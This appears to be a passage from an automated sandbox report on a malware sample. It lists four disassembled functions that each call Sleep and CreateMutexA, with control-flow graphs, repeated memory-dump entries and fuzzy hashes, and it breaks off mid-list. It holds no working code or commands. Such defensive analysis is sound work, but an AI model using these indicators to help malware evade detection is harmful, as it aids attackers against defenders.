                                                                                                                                              Function 0040A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 56 40a079-40a099 60 40a0c7-40a0e3 56->60 61 40a09b-40a0a7 56->61 64 40a111-40a130 60->64 65 40a0e5-40a0f1 60->65 62 40a0a9-40a0b7 61->62 63 40a0bd-40a0c4 call 41d663 61->63 62->63 66 40a930 62->66 63->60 70 40a132-40a13e 64->70 71 40a15e-40a916 call 4180c0 64->71 68 40a0f3-40a101 65->68 69 40a107-40a10e call 41d663 65->69 76 40a953-40a994 Sleep CreateMutexA 66->76 77 40a930 call 436c6a 66->77 68->66 68->69 69->64 72 40a140-40a14e 70->72 73 40a154-40a15b call 41d663 70->73 72->66 72->73 73->71 85 40a996-40a998 76->85 86 40a9a7-40a9a8 76->86 77->76 85->86 88 40a99a-40a9a5 85->88 88->86
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 108dfb5e08b11b62366e0982811db5704d32c1e3b546a67ab93984d725565676
                                                                                                                                              • Instruction ID: eafa49c87a8fc05e7a5c16f9c0c5f61d47c02a669d4c54e9ab8eb7b10990d1c4
                                                                                                                                              • Opcode Fuzzy Hash: 108dfb5e08b11b62366e0982811db5704d32c1e3b546a67ab93984d725565676
                                                                                                                                              • Instruction Fuzzy Hash: A93127717002049BEB18DB78CD89BADB762DB86314F24863EE014AB3D5C77D5990875B
                                                                                                                                              Function 0040A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 90 40a1ae-40a1ce 94 40a1d0-40a1dc 90->94 95 40a1fc-40a218 90->95 96 40a1f2-40a1f9 call 41d663 94->96 97 40a1de-40a1ec 94->97 98 40a246-40a265 95->98 99 40a21a-40a226 95->99 96->95 97->96 100 40a935 97->100 104 40a293-40a916 call 4180c0 98->104 105 40a267-40a273 98->105 102 40a228-40a236 99->102 103 40a23c-40a243 call 41d663 99->103 107 40a953-40a994 Sleep CreateMutexA 100->107 108 40a935 call 436c6a 100->108 102->100 102->103 103->98 111 40a275-40a283 105->111 112 40a289-40a290 call 41d663 105->112 119 40a996-40a998 107->119 120 40a9a7-40a9a8 107->120 108->107 111->100 111->112 112->104 119->120 122 40a99a-40a9a5 119->122 122->120
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 4f88d42c7f84fb5c0731c81d0fa33aa8bb15b47fc617e24147feba342801e66a
                                                                                                                                              • Instruction ID: 714888cdb039a2fff2648d0db7fb0d18f8100137784089f0b748a5d6708c997b
                                                                                                                                              • Opcode Fuzzy Hash: 4f88d42c7f84fb5c0731c81d0fa33aa8bb15b47fc617e24147feba342801e66a
                                                                                                                                              • Instruction Fuzzy Hash: 04312771B002409BEB18DB68DD89BADB762AB86310F24467EE014AB3D1D77D4990875A
                                                                                                                                              Function 0040A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 124 40a418-40a438 128 40a466-40a482 124->128 129 40a43a-40a446 124->129 132 40a4b0-40a4cf 128->132 133 40a484-40a490 128->133 130 40a448-40a456 129->130 131 40a45c-40a463 call 41d663 129->131 130->131 134 40a93f-40a949 call 436c6a * 2 130->134 131->128 138 40a4d1-40a4dd 132->138 139 40a4fd-40a916 call 4180c0 132->139 136 40a492-40a4a0 133->136 137 40a4a6-40a4ad call 41d663 133->137 155 40a94e-40a994 call 436c6a Sleep CreateMutexA 134->155 156 40a949 call 436c6a 134->156 136->134 136->137 137->132 144 40a4f3-40a4fa call 41d663 138->144 145 40a4df-40a4ed 138->145 144->139 145->134 145->144 160 40a996-40a998 155->160 161 40a9a7-40a9a8 155->161 156->155 160->161 162 40a99a-40a9a5 160->162 162->161
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 06f7df2402c01079666c7f94c8a1f007bd2a2ae193dbf8d6b7f64d6273c0f923
                                                                                                                                              • Instruction ID: 887f34e292501d59d48461a3897491de8c914ce79cb9fcf523fad74bf4edd9d5
                                                                                                                                              • Opcode Fuzzy Hash: 06f7df2402c01079666c7f94c8a1f007bd2a2ae193dbf8d6b7f64d6273c0f923
                                                                                                                                              • Instruction Fuzzy Hash: 29312771B002009BEB18DB78DD8DBADB762EB86314F24862EE014A73D5D7BD4990875B
                                                                                                                                              Function 0040A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 164 40a54d-40a56d 168 40a59b-40a5b7 164->168 169 40a56f-40a57b 164->169 172 40a5e5-40a604 168->172 173 40a5b9-40a5c5 168->173 170 40a591-40a598 call 41d663 169->170 171 40a57d-40a58b 169->171 170->168 171->170 176 40a944-40a949 call 436c6a 171->176 174 40a632-40a916 call 4180c0 172->174 175 40a606-40a612 172->175 178 40a5c7-40a5d5 173->178 179 40a5db-40a5e2 call 41d663 173->179 181 40a614-40a622 175->181 182 40a628-40a62f call 41d663 175->182 191 40a94e-40a994 call 436c6a Sleep CreateMutexA 176->191 192 40a949 call 436c6a 176->192 178->176 178->179 179->172 181->176 181->182 182->174 198 40a996-40a998 191->198 199 40a9a7-40a9a8 191->199 192->191 198->199 200 40a99a-40a9a5 198->200 200->199
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
